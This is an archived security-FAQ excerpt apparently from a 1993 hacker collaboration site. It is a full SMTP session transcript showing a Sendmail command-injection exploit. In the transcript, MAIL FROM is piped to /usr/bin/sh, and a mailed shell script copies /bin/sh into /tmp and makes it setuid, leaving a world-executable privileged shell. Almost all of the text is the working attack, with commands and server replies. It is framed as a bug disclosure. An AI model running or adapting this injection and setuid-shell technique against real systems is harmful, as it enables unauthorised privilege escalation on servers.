..:-={{Collaborative Security Information Center}}=-:..
          X-TREME & TECHNOTRONIC Security Collaboration Project
     http://www.technotronic.com  -=©=-  http://www.x-treme.abyss.com

[From CSC FAQ, credit to J. Rawlinson]
---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13
-0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with @.@ on a line by itself
 From: jhawk"panix.com (John Hawkinson)
  To: jhawk"panix.com (John Hawkinson)
  Return-Receipt-To: |foobar
  Subject: This is a large hole in the ground.
  X-Disclaimer: We take no responsibility for what might happen
  Hi there. Wanna play ball?
  #!/bin/sh
  #The above line is just in case :-)
  echo This is a Serious Bug > /tmp/bug
  echo id reports: >> /tmp/bug
  /usr/bin/id >> /tmp/bug
  echo Fixing this would be good >> /tmp/bug
  cp /bin/sh /tmp/bugshell
  chmod u+s /tmp/bugshell
  echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
  chmod ugo+rx /tmp/bugshell
.
250 Ok
quit
221 panix.com closing connection